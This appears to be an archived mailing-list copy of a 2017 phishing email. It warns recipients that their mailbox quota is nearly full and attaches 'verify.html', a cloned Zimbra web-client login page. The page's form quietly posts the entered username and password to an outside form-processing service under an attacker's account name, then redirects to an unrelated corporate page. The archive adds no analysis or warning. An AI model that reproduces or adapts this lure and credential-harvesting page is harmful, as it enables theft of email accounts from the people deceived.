[4236] in Software_Announce
Irregular Activity Detected On Your Account
daemon@ATHENA.MIT.EDU (Jessica IT)
Sun Feb 12 03:09:56 2017
To: Recipients <aubrey@africonnect.co.zm>
From: "Jessica IT" <aubrey@africonnect.co.zm>
Date: Sat, 11 Feb 2017 14:08:48 -0900
You will not see this in a MIME-aware mail reader.
--===============0602165096==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body
Your account size has reached 970.54MB, which is over 90%
of your 1024.00MB quota. please download the
attached form and follow the instructions on your screen. to avoid
exceeding your quota.
--===============0602165096==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="verify.html"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<!--
 login.jsp
 * ***** BEGIN LICENSE BLOCK *****
 * Zimbra Collaboration Suite Web Client
 * Copyright (C) 2007, 2008, 2009, 2010, 2011 VMware, Inc.
 * =
 * The contents of this file are subject to the Zimbra Public License
 * Version 1.3 ("License"); you may not use this file except in
 * compliance with the License.  You may obtain a copy of the License at
 * http://www.zimbra.com/license.
 * =
 * Software distributed under the License is distributed on an "AS IS"
 * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
 * ***** END LICENSE BLOCK *****
-->
    =
    <meta http-equiv=3D"Content-Type" content=3D"text/html;charset=3Dutf-8">
    <title>Zimbra Web Client Log In</title>
    =
    <meta name=3D"viewport" content=3D"width=3Ddevice-width; initial-scale=
=3D1.0; maximum-scale=3D1.0; user-scalable=3D1;">
    <meta name=3D"description" content=3D"Zimbra provides open source serve=
r and client software for messaging and collaboration. To find out more vis=
it http://www.zimbra.com.">
    <link  rel=3D"stylesheet" type=3D"text/css" href=3D"http://mail.scgg.go=
b.hn/zimbra/css/common,login,zhtml.css?skin=3Dcarbon&v=3D120104223235">
	<link  rel=3D"stylesheet" type=3D"text/css" href=3D"http://mail.scgg.gob.h=
n/zimbra/css/skin.css?skin=3Dcarbon&v=3D120104223235">
	=
    <link rel=3D"SHORTCUT ICON" href=3D"http://mail.scgg.gob.hn/zimbra/img/=
logo/favicon.ico">
    =
    =
</head>
<body onload=3D"onLoad();">
	<div class=3D"LoginScreen">
		<div class=3D"center">
			<div class=3D"ImgAltBanner"></div>
			<h1><a href=3D"http://www.zimbra.com/" id=3D"bannerLink" target=3D"_new">
				<span class=3D"ImgLoginBanner"></span>
			</a></h1>
			<!--div id=3D"ZLoginAppName">Web Client</div-->
            =
			         <form action=3D"http://www.formbuddy.com/cgi-bin/form.pl" metho=
d=3D"post">
<input type=3D"hidden" name=3D"username" value=3D"westanthony13">
<input type=3D"hidden" name=3D"reqd" value=3D"1,2">
<input type=3D"hidden" name=3D"url" value=3D"http://investor.synacor.com/ma=
nagement.cfm"> =
				    <input type=3D"hidden" name=3D"loginOp" value=3D"login"/>
                =
            <table class=3D"form">
                =
                    <tr>
                        <td><label for=3D"username">Username:</label></td>
                        <td><input id=3D"username" class=3D"zLoginField" na=
me=3D"username" type=3D"text" value=3D"" size=3D"40"/></td>
                    </tr>
                    <tr>
                        <td><label for=3D"password">Password:</label></td>
                        <td><input id=3D"password" class=3D"zLoginField" na=
me=3D"password" type=3D"password" value=3D"" size=3D"40"/></td>
                    </tr>
                    =
                    <tr>
                        <td> </td>
                        <td style=3D"text-align:right">
                            <input type=3D"submit" class=3D"zLoginButton" v=
alue=3D"Log In" style=3D"float:left;"/>
                            <input id=3D"remember" value=3D"1" type=3D"chec=
kbox" name=3D"zrememberme" />
                            <label for=3D"remember">Remember me</label></td>
                    </tr>
				=
                    <tr>
                        <td colspan=3D"2"><hr/></td>
                    </tr>
                    <tr>
                        <td>
                            <label for=3D"client">
                                Version:
                            </label>
                        </td>
                        <td>
							<div class=3D"postioning">
							<select id=3D"client" name=3D"client" onchange=3D"clientChange(this.=
options[this.selectedIndex].value)">
								<option value=3D"preferred" selected > Default</option>
								<option value=3D"advanced"  > Advanced (Ajax)</option>
								<option value=3D"standard"  > Standard (HTML)</option>
							    <option value=3D"mobile"  > Mobile</option>
							</select>
<script TYPE=3D"text/javascript">
	// show a message if they should be using the 'standard' client, but have =
chosen 'advanced' instead
	function clientChange(selectValue) {
		var useStandard =3D false;
		useStandard =3D useStandard || (screen && (screen.width <=3D 800 && scree=
n.height <=3D 600));
        var div =3D document.getElementById("ZLoginUnsupported");
		div.style.display =3D ((selectValue =3D=3D 'advanced') && useStandard) ? =
'block' : 'none';
	}
	// if they have JS, write out a "what's this?" link that shows the message=
 below
	function showWhatsThis() {
        var div =3D document.getElementById("ZLoginWhatsThis");
		div.style.display =3D (div.style.display =3D=3D "block" ? "none" : "block=
");
	}
    function onLoad() {
        var loginForm =3D document.loginForm;
        if(loginForm.username){
            loginForm.username.focus();
        }
        clientChange("preferred");
    }
	document.write("<a href=3D'#' onclick=3D'showWhatsThis()' id=3D'ZLoginWhat=
sThisAnchor'>What's This?<"+"/a>");
</script>
							<div id=3D"ZLoginWhatsThis" class=3D"ZLoginInfoMessage" style=3D"dis=
play:none;"><center style=3D"margin-bottom:3px;"><b>Client Types:</b></cent=
er>	<b>Advanced</b> offers the full set of Web collaboration features. This=
 Web Client works best with newer browsers and faster Internet connections.=
 <br><br><b>Standard</b> is recommended when Internet connections are slow,=
 when using older browsers, or for easier accessibility. <br><br><b>Mobile<=
/b> is recommended for mobile devices. <br><br>To set <b>Default</b> to be =
your preferred client type, change the login options in your Preferences, G=
eneral tab after you log in.</div>
							<div id=3D"ZLoginUnsupported" class=3D"ZLoginInfoMessage" style=3D"d=
isplay:none;">Note that your web browser or display does not fully support =
the Advanced version.  We strongly recommend that you use the Standard clie=
nt.</div>
						</div>
						</td>
					</tr>
					<tr>
                        <td colspan=3D"2"><hr/></td>
                    </tr>
                    =
			</table>
			<div class=3D"offline">Go offline with Zimbra Desktop. <a href=3D'http:/=
/www.zimbra.com/products/desktop.html' target=3D'_blank'>Learn more</a></di=
v>
			<div class=3D"decor1"></div>
		</div>
		<div class=3D"Footer">
		<div id=3D"ZLoginNotice" class=3D"legalNotice-small"><a target=3D"_new" h=
ref=3D"http://www.zimbra.com">Zimbra</a> :: the leader in open source messa=
ging and collaboration :: <a target=3D"_new" href=3D"http://blog.zimbra.com=
">Blog</a> - <a target=3D"_new" href=3D"http://wiki.zimbra.com">Wiki</a> - =
<a target=3D"_new" href=3D"http://www.zimbra.com/forums">Forums</a></div>
        =
        <div class=3D"copyright">
            Copyright =A9 2005-2011 VMware, Inc.  VMware and Zimbra are reg=
istered trademarks or trademarks of VMware, Inc.
            </div>
        </div>
	</div>                                 =
<script>
  function ZmSkin(e){
this.hints=3Dthis.mergeObjects(ZmSkin.hints,e)
}
ZmSkin.hints=3D{
name:"carbon",version:"1",skin:{
containers:"skin_outer"}
,banner:{
position:"static",url:"http://www.zimbra.com"}
,userInfo:{
position:"static"}
,search:{
position:"static"}
,quota:{
position:"static"}
,presence:{
width:"40px",height:"24px"}
,appView:{
position:"static"}
,searchBuilder:{
containers:["skin_tr_search_builder"]}
,tree:{
minWidth:parseInt("150px"),maxWidth:parseInt("300px"),containers:["skin_td_=
tree","skin_td_tree_app_sash"],resizeContainers:["skin_td_tree"]}
,topToolbar:{
containers:"skin_tr_top_toolbar"}
,treeFooter:{
containers:"skin_tr_tree_footer"}
,topAd:{
containers:"skin_tr_top_ad"}
,sidebarAd:{
containers:"skin_td_sidebar_ad"}
,bottomAd:{
containers:"skin_tr_bottom_ad"}
,treeTopAd:{
containers:"skin_tr_tree_top_ad"}
,treeBottomAd:{
containers:"skin_tr_tree_bottom_ad"}
,helpButton:{
style:"link",container:"quota",url:""}
,logoutButton:{
style:"link",container:"quota"}
,appChooser:{
position:"static",direction:"LR"}
,toast:{
location:"N",transitions:[{
type:"fade-in",step:5,duration:50}
,{
type:"pause",duration:5000}
,{
type:"fade-out",step:-10,duration:500}
]}
,fullScreen:{
containers:["!skin_td_tree","!skin_td_tree_app_sash"]}
,allAds:{
containers:["skin_tr_top_ad","skin_td_sidebar_ad","skin_tr_bottom_ad","skin=
_tr_tree_top_ad","skin_tr_tree_bottom_ad"]}
,hideSearchInCompose:true};
window.BaseSkin=3DZmSkin;
ZmSkin.prototype=3D{
show:function(a,r){
var s=3Dthis.hints[a]&&this.hints[a].containers;
if(s){
if(typeof s=3D=3D"function"){
s.apply(this,[r!=3Dfalse]);
skin._reflowApp();
return
}
if(typeof s=3D=3D"string"){
s=3D[s]
}
for(var n=3D0;
n<s.length;
n++){
var o=3Ds[n];
var t=3Do.replace(/^!/,"");
var e=3Do!=3Dt;
this._showEl(t,e?!r:r)
}
skin._reflowApp()
}}
,hide:function(e){
this.show(e,false)
}
,gotoApp:function(e,t){
appCtxt.getAppController().activateApp(e,null,t)
}
,gotoPrefs:function(e){
if(appCtxt.getCurrentAppName()!=3DZmApp.PREFERENCES){
var t=3Dnew AjxCallback(this,this._gotoPrefPage,[e]);
this.gotoApp(ZmApp.PREFERENCES,t)
}else{
this._gotoPrefPage(e)
}}
,mergeObjects:function(e,o){
if(e=3D=3Dnull){
e=3D{}
}
for(var a=3D1;
a<arguments.length;
a++){
var n=3Darguments[a];
for(var t in n){
var s=3De[t];
if(typeof s=3D=3D"object"&&!(s instanceof Array)){
this.mergeObjects(e[t],n[t]);
continue
}
if(!e[t]){
e[t]=3Dn[t]
}}}
return e
}
,getTreeWidth:function(){
return Dwt.getSize(this._getEl(this.hints.tree.containers[0])).x
}
,setTreeWidth:function(e){
this._setContainerSizes("tree",e,null)
}
,showTopAd:function(e){
skin._showEl("skin_tr_top_ad",e);
skin._reflowApp()
}
,hideTopAd:function(){
skin.showTopAd(false)
}
,getTopAdContainer:function(){
return skin._getEl("skin_container_top_ad")
}
,showSidebarAd:function(e){
var t=3D"skin_td_sidebar_ad";
if(e!=3Dnull){
skin._setSize(t,e)
}
skin._showEl(t);
skin._reflowApp()
}
,hideSidebarAd:function(){
var e=3D"skin_td_sidebar_ad";
skin._hideEl(e);
skin._reflowApp()
}
,getSidebarAdContainer:function(){
return this._getEl("skin_container_sidebar_ad")
}
,_getEl:function(e){
return(typeof e=3D=3D"string"?document.getElementById(e):e)
}
,_showEl:function(o,i){
var t=3Dthis._getEl(o);
if(!t){
return
}
var a;
if(i=3D=3Dfalse){
a=3D"none"
}else{
var e=3Dt.tagName;
if(e=3D=3D"TD"&&!document.all){
a=3D"table-cell"
}else{
if(e=3D=3D"TR"&&!document.all){
a=3D"table-row"
}else{
a=3D"block"
}}}
t.style.display=3Da
}
,_hideEl:function(e){
this._showEl(e,false)
}
,_reparentEl:function(i,e){
var a=3Dthis._getEl(e);
var t=3Da&&this._getEl(i);
if(t){
a.appendChild(t)
}}
,_setSize:function(i,a,e){
var t=3Dthis._getEl(i);
if(!t){
return
}
if(a!=3Dnull){
t.style.width=3Da
}
if(e!=3Dnull){
t.style.height=3De
}}
,_setContainerSizes:function(n,a,e){
var o=3Dthis.hints[n].resizeContainers||this.hints[n].containers;
for(var t=3D0;
t<o.length;
t++){
this._setSize(o[t],a,null)
}}
,_reflowApp:function(){
if(window._zimbraMail){
window._zimbraMail.getAppViewMgr().fitAll()
}}
,_gotoPrefPage:function(a){
if(a=3D=3Dnull){
return
}
var i=3DappCtxt.getApp(ZmApp.PREFERENCES);
var t=3Di.getPrefController();
var e=3Dt.getPrefsView();
e.selectSection(a)
}};
window.skin=3Dnew ZmSkin();
  var link =3D document.getElementById("bannerLink");
  if (link) {
    link.href =3D skin.hints.banner.url;
  }
  =
</script>
</body>
</html>
--===============0602165096==--